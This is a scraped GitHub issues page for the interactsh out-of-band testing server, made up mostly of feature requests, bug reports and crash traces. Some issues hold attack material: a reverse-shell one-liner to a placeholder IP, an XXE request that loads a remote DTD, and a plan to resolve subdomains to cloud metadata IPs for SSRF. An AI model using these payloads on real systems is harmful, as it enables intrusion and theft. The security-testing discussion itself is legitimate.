projectdiscovery / interactsh Goto Github PK
View Code? Open in Web Editor NEWAn OOB interaction gathering server and client library
Home Page: https://app.interactsh.com
License: MIT License
An OOB interaction gathering server and client library
Home Page: https://app.interactsh.com
License: MIT License
Maybe it is not very necessary, but if it would be something interesting, a client for burpsuite (community), it is necessary to take into account that it would be an extra maintenance, no wonder they reject the idea. but still I comment
Adding goflags support into interactsh-client and interactsh-server
Possible implementation: libpcap/xdp?
Right now on sending an http request to the interact.sh url we simply get the following response:
Recieved HTTP interactionfrom <ip> at <time>
it would be helpful if we could see the contents of the get/post content of the http request like in https://webhook.site/
Ex:
Request at target
GET customSubdomain.<interactshsubdomin>.interact.sh/someData
or
POST customSubdomain.<interactshsubdomin>.interact.sh
{
value: SomeData
}
interactsh-client logs display SomeData
or the whole json file
Probably already covered by #10
application/json
instead of text/plain
on successful response./register
endpointHTTP/2 200 OK
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Origin: *
Content-Length: 0
Date: Sat, 11 Sep 2021 09:50:37 GMT
{"message":"registration successful"}
HTTP/2 400 Bad Request
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Origin: http://localhost:3000
Content-Type: text/plain; charset=utf-8
Content-Length: 456
Date: Sat, 11 Sep 2021 09:21:33 GMT
{"error":"could not get extra interactions: could not get id from cache"}
{"data":[],"extra":null,"aes_key":"XXX"}
@Mzack9999 we may also filter regular output with this feature.
For example with interactsh-client -http-only
or -dns-only
Current behavior:-
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 103.195.200.42 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 172.253.226.98 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 103.195.200.42 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received DNS interaction (A) from 172.217.34.131 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:24
After support:-
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:23
[c3rbe3pe0084ii3p82sgcd5mqryyyyyyn] Received HTTP interaction from 103.22.142.125 at 2021-07-20 11:44:24
Originally posted by @ehsandeep in #40 (comment)
Sometimes I receive too many DNS requests from targets. I will like to be able to only retrieve HTTP requests in verbose output.
#output all requests/responses
interactsh-client -v
#output only http requests/responses
interactsh-client -v -http-only
#output only dns requests/responses
interactsh-client -v -dns-only
secret-key
requirement upon deregister request.correlation-id
validation check upon new registration.Block bots, if we use notify and bots crawl it, it will be noisy notifs.
interactsh-client -o logs.txt
hostmaster
flag as admin@domain
origin-url
flag for dynamic ACAO used for web interactsh clientHello I am trying to use interactsh and I need the server to listen on ports other than the default 53, 443, etc due to a reverse proxy in front of the server. I looked at the source code and see there's a string concat with :53 for dns, so it appears it's not possible to make this part dynamic. Could you please add the ability to listen on different ports other than the default? Thanks.
Hello team,
Just a suggestion , if you can make the collab url as wildcard (i.e. *..interact.sh resolve to .interact.sh), just same as the burp collaborator do.
If that can be done , that would be greatful.
And thanks for your awesome Tools.
Hello and thank you for this awesome tool, it will surely come in handy during our testing.
Could you make the default text more easily customizable and persistent between updates for those of using self-hosted servers? Currently it includes a line that says If you find communications or exchanges with the Interact.sh server in your logs, it is possible that someone has been testing your applications using our hosted service, app.interact.sh.
Maybe it should detect the base domain being used by the server and display that instead?
When I run the command interactsh-server -domain mydomain.com -hostmaster [email protected] -ip [VPS IP]. The following output is given without any errors:
2021/05/01 08:45:17 Creating new order for domains: [*.mydomain.com mydomain.com]
2021/05/01 08:45:17 Order created: https://acme-v02.api.letsencrypt.org/acme/order/121967319/9409571122
2021/05/01 08:45:17 Fetching authorization: https://acme-v02.api.letsencrypt.org/acme/authz-v3/12762297545
2021/05/01 08:45:17 Fetched authorization: mydomain.com
2021/05/01 08:45:27 Updating challenge for authorization mydomain.com: https://acme-v02.api.letsencrypt.org/acme/chall-v3/12762297545/FkqiUg
But the server is not giving A records when queried. I already had a letsencrypt cert but even after I deleted the cert nothing changed the same output is given
custom the length of the subdomain payload, for length-limited input scenarios.
The server adds an allowable length range parameter, example: -payload-length 1-16
The client specifies the length of the generated payload, example: -payload-length 4
┌──(root💀milani)-[~]
└─# go get -v github.com/projectdiscovery/interactsh/cmd/interactsh-client 127 ⨯
github.com/pierrec/lz4 (download)
cannot find package "github.com/pierrec/lz4/v4" in any of:
/usr/lib/go-1.15/src/github.com/pierrec/lz4/v4 (from $GOROOT)
/root/go/src/github.com/pierrec/lz4/v4 (from $GOPATH)
Hello and thank you for this awesome tool, it will surely come in handy during our testing.
The current behavior of interactsh is to create a randomized subdomain like c282n3l3djgbti5v595gcnenzdoyyyyyn.domain.tld
, which is fine and all, however, we have a pretty nice 4 x 2 domain and we feel that smaller payloads are the best, so could you allow the use of the base domain and/or customized sub-domains for self-hosted servers in addition to the randomized subdomains?
Edited to ask for customized sub-domains option as well. 👍🏻
More protocols :D
I see that you have implemented the burp collaborator feature of wildcard mapping to the source collaborator address.
Example : ..interact.sh -> .interact.sh
That's great feature . But it would be great if you print this whole ..interact.sh on the terminal whenever a query triggered without verbose flag. Because verbose flag print many unwanted information (in case of DNS queries).
Example:
if we ping anything.<UNIQUE-ID>.interact.sh
And the interactsh client shows ( without verbose flag)
[<UNIQUE-ID>] Recieved DNS interaction (A) from <ORIGIN-IP> at <TIMESTAMP>
So the anything is omitted , which is sometimes important during Bug Bounties.
Ref for implementation: https://github.com/SecureAuthCorp/impacket
Previously:
defaultCacheMaxSize = 5000
Now:
defaultCacheMaxSize = 1000000
How about DHCP? For example, with CVE-2019-13263, you could encode data to be sent cross-router into the 32-bit Transaction ID field. More research is needed, but obscure DHCP bugs would be cool to find. (;
Originally posted by @geeknik in #7 (comment)
This is not completed but limited available logs.
net/http.(*conn).readRequest(0xc03c1d72c0, 0x921bf8, 0xc03c80ad80, 0x0, 0x0, 0x0)
/snap/go/7954/src/net/http/server.go:966 +0x19d
net/http.(*conn).serve(0xc03c1d72c0, 0x921ca0, 0xc03c80ad80)
/snap/go/7954/src/net/http/server.go:1858 +0x705
created by net/http.(*Server).Serve
/snap/go/7954/src/net/http/server.go:2993 +0x39b
goroutine 197138914 [IO wait, 2 minutes]:
internal/poll.runtime_pollWait(0x7f922ad4b4f0, 0x72, 0xffffffffffffffff)
/snap/go/7954/src/runtime/netpoll.go:222 +0x55
internal/poll.(*pollDesc).wait(0xc09119b318, 0x72, 0x1000, 0x1000, 0xffffffffffffffff)
/snap/go/7954/src/internal/poll/fd_poll_runtime.go:87 +0x45
internal/poll.(*pollDesc).waitRead(...)
/snap/go/7954/src/internal/poll/fd_poll_runtime.go:92
internal/poll.(*FD).Read(0xc09119b300, 0xc08affa000, 0x1000, 0x1000, 0x0, 0x0, 0x0)
/snap/go/7954/src/internal/poll/fd_unix.go:166 +0x1d5
net.(*netFD).Read(0xc09119b300, 0xc08affa000, 0x1000, 0x1000, 0xc0083f8400, 0xc05a07d668, 0x89adb9)
/snap/go/7954/src/net/fd_posix.go:55 +0x4f
net.(*conn).Read(0xc0bff81610, 0xc08affa000, 0x1000, 0x1000, 0x0, 0x0, 0x0)
/snap/go/7954/src/net/net.go:183 +0x91
net/http.(*connReader).Read(0xc09170f470, 0xc08affa000, 0x1000, 0x1000, 0x4b6956, 0xc09215d08b, 0xb)
/snap/go/7954/src/net/http/server.go:780 +0x1b9
bufio.(*Reader).fill(0xc08afe7aa0)
/snap/go/7954/src/bufio/bufio.go:101 +0x108
bufio.(*Reader).ReadSlice(0xc08afe7aa0, 0xc03828f80a, 0x764367, 0xc08ac8f080, 0xb1e2ae, 0x2, 0x2)
/snap/go/7954/src/bufio/bufio.go:360 +0x3d
bufio.(*Reader).ReadLine(0xc08afe7aa0, 0x203024, 0x203024, 0x0, 0x0, 0xc03828fa78, 0x764dc5)
/snap/go/7954/src/bufio/bufio.go:389 +0x34
net/textproto.(*Reader).readLineSlice(0xc0923b0870, 0xc0922c9200, 0xc03828f9e8, 0x4dc773, 0xc09119b300, 0x43a77c)
/snap/go/7954/src/net/textproto/reader.go:57 +0xd6
net/textproto.(*Reader).ReadLine(...)
/snap/go/7954/src/net/textproto/reader.go:38
net/http.readRequest(0xc08afe7aa0, 0x0, 0xc0922c9200, 0x0, 0x0)
/snap/go/7954/src/net/http/request.go:1027 +0xaa
net/http.(*conn).readRequest(0xc0917ac140, 0x921bf8, 0xc0910ff980, 0x0, 0x0, 0x0)
/snap/go/7954/src/net/http/server.go:966 +0x19d
net/http.(*conn).serve(0xc0917ac140, 0x921ca0, 0xc0910ff980)
/snap/go/7954/src/net/http/server.go:1858 +0x705
created by net/http.(*Server).Serve
/snap/go/7954/src/net/http/server.go:2993 +0x39b
Describe the bug
Project depends on github.com/prologic/smtpd, but https://github.com/prologic/smtpd results in a 404, repo seems gone.
Error occurred when trying to open the Nuclei source in GoLand on a pristine machine.
Version
Nuclei: Trunk of master (currently at 84244b5)
Interactsh: Seems to be present in trunk, too
Screenshot of the error or bug
go list -modfile=nuclei/v2/go.mod -m -json -mod=mod all #gosetup
go: github.com/projectdiscovery/[email protected] requires
github.com/prologic/[email protected]: invalid version: git fetch -f origin refs/heads/*:refs/heads/* refs/tags/*:refs/tags/* in ~/go/pkg/mod/cache/vcs/65b3100cfa8e2061b6047e41aaceb4a1e850f70977a718cfde5bd0e009bb0722: exit status 128
running interactsh-client without any options is triggering the below error.
Version : 0.0.2
OS: OSX
$interactsh-client
_ __ __ __
(_)___ / /____ _________ ______/ /______/ /_
/ / __ \/ __/ _ \/ ___/ __ '/ ___/ __/ ___/ __ \
/ / / / / /_/ __/ / / /_/ / /__/ /_(__ ) / / /
/_/_/ /_/\__/\___/_/ \__,_/\___/\__/____/_/ /_/ v0.0.2
projectdiscovery.io
[FTL] Could not create client: could not make register request: POST https://interact.sh/register giving up after 6 attempts: Post "https://interact.sh/register": dial tcp: lookup interact.sh: no such host
``Hello team , thanks for all the great things you do . I do have an issue with the interact client where dns request are not logged . http works fine but when ever the request is a dns request only, nothing works
nslookup blahblahblah.c4l7u968kh02ipm31b50jntiyyozltipn.interact.sh
does not work at all .
Generating new intractable payload
User controlled poll time settings.
Multi tab support to manage / track / view multiple payloads at same time.
Filters for displaying DNS / HTTP / SMTP Interaction in default view.
Fields (same as burp only for inspiration)
Fields per interaction type
DNS
HTTP
SMTP
Misc Features
https://xsshunter.com/features
Using HTML5 canvas API for self hosted instances.
If possible, for shared public instance.
custom url for somthing content. like:
request url: http://interactsh.sh/bash get response : sh -i >& /dev/tcp/10.10.10.10/9001 0>&1
It has been reported several times that the current domain is used by interactsh server - interact.sh - is not resolved by a few VPS providers, preventing such systems from using interactsh client and Nuclei integration.
The default interactsh server will now be located at https://interactsh.com The old server (interact.sh
) will remain available.
POST / HTTP/1.1
Host: company.com
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root SYSTEM "http://ID.interact.sh/file.dtd">
<root>
<email>&pwnfromME;</email>
<password>*********</password>
</root>
Sometimes I use Responder just to collect incoming hashes from AD/Windows integrated apps
it's not a big inconvenience for me to just configure it to listen from my private hosted interactsh-server, but it would be a nice to have a built in listener to register/capture/note those events dont you think ?
Interactsh server version:- 0.0.6
2021/10/09 22:47:15 TLS certificates are not expiring, continue!
2021/10/09 22:47:15 Listening on DNS, SMTP and HTTP ports
fatal error: runtime: out of memory
runtime stack:
runtime.throw(0xf6974e, 0x16)
/snap/go/8408/src/runtime/panic.go:1117 +0x72
runtime.sysMap(0xc0d0000000, 0x4000000, 0x161bdb0)
/snap/go/8408/src/runtime/mem_linux.go:169 +0xc6
runtime.(*mheap).sysAlloc(0x16029a0, 0x400000, 0x7fffffffffff, 0x7ff7077fdd98)
/snap/go/8408/src/runtime/malloc.go:729 +0x1e5
runtime.(*mheap).grow(0x16029a0, 0x1, 0x0)
/snap/go/8408/src/runtime/mheap.go:1346 +0x85
runtime.(*mheap).allocSpan(0x16029a0, 0x1, 0x1100, 0x1ff)
/snap/go/8408/src/runtime/mheap.go:1173 +0x609
runtime.(*mheap).alloc.func1()
/snap/go/8408/src/runtime/mheap.go:910 +0x59
runtime.systemstack(0xc000314900)
/snap/go/8408/src/runtime/asm_amd64.s:379 +0x66
runtime.mstart()
/snap/go/8408/src/runtime/proc.go:1246
Complete crash trace - interact-crash.txt
I hosted your interactsh-server on a a droplet. Everything is working like a charm. But I have a question:
Can I use an old generated payload link ? access its http/dns/smtp requests within the server using the client side (interactsh-client ? please ?
➜ interactsh-client git:(main) ✗ ./interactsh-client -url https://10.10.123.237
_ __ __ __
()__ / /____ _________ / // /_
/ / __ / / _ / / __ '/ / _/ / __
/ / / / / // __/ / / // / // /( ) / / /
/// //__/_// _,/___/_/__// // v0.0.3
projectdiscovery.io
[INF] Listing 1 URL for OOB Testing
[INF] c43v1fecie6h4kfllrvgcrd9bxeyyyyyn.10.10.123.237
How to use httplog ?
http://10.10.123.237/c43v1fecie6h4kfllrvgcrd9bxeyyyyyn
Is this supported ?
As Interactsh is about OOB interaction supporting DNS it would be nice to have a DNS rebinding by the same occasion.
This mean having a way to get resolvable resource records with any given contents for assisting in detection and exploitation of SSRF-related vulnerabilities.
I have fetched a list of DNS rebinding tools but most are hard to setup, featureless and unmaintained. The most interesting project to understand all major features is 1u.ms (source), their website describe well all possibilities.
Right now Interactsh is similar to most HTTP request collector and inspector tools but lacks of DNS rebinding.
What I said for DNS could also be meaningful for HTTP, being able choose the body or headers served by the server.
An FTP listener would be interesting to include in Interactsh.
It would be valuable to log the authentication that an FTP client uses along with the commands they ran. It would be helpful to see the files the external client attempted to read or upload.
FTP is supported by default in Java applications where an attacker has control over a URL object. It comes up in XXE OOB testing as well.
Hey all,
I may be simply looking in the wrong place but there seems to be little guidance on what needs to be in place for the interactsh-server to succeed
for example:
./interactsh-server -domain yoink.domain -hostmaster jc@doain -ip 44.44.44.4xx -debug
following the guide will tell me '[ERR] Could not serve dns on port 53: listen udp 0.0.0.0:53: bind: address already in use'
and 021/07/16 10:40:30 Creating new order for domains: [*.yoink.domain yoink.domain]
2021/07/16 10:40:30 Order created: https://acme-v02.api.letsencrypt.org/acme/order/000000/00000000
2021/07/16 10:40:30 Fetching authorization: https://acme-v02.api.letsencrypt.org/acme/authz-v3/000000000
2021/07/16 10:40:30 Fetched authorization: yoink.domain
2021/07/16 10:40:40 Updating challenge for authorization yoink.domain: https://acme-v02.api.letsencrypt.org/acme/chall-v3/0000000000/8z7VSF
[FTL] Could not generate certs for auto TLS
but disabling systemd-resolved only tells me only 'Could not generate certs for auto TLS' assuming i cant resolve it anymore :)
so, any pointers to what i'm not getting in regards to why this is failing ? and to the title, might that be a good common document for all ?
Thanks!
Linux yoinker 5.4.0-73-generic projectdiscovery/nuclei#82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Hello, currently there is no protection against allowing anyone to connect to a self-hosted hosted if they know the URL. Please add some sort of authentication mechanism so that servers aren't abused. Maybe something like this?
$ interactsh-server -auth "$(uuid-gen)"
$ interactsh-client -auth "generated-uuid" -url https://domain.tld
Thank you.
Add 2 subdomains which resolve to various cloud provider metadata IPs.
For general cloud services, one should resolve to: 169.254.169.254
For Alibaba, one should resolve to: 100.100.100.200
Once created, the metadata-*yaml templates can be updated to use them.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.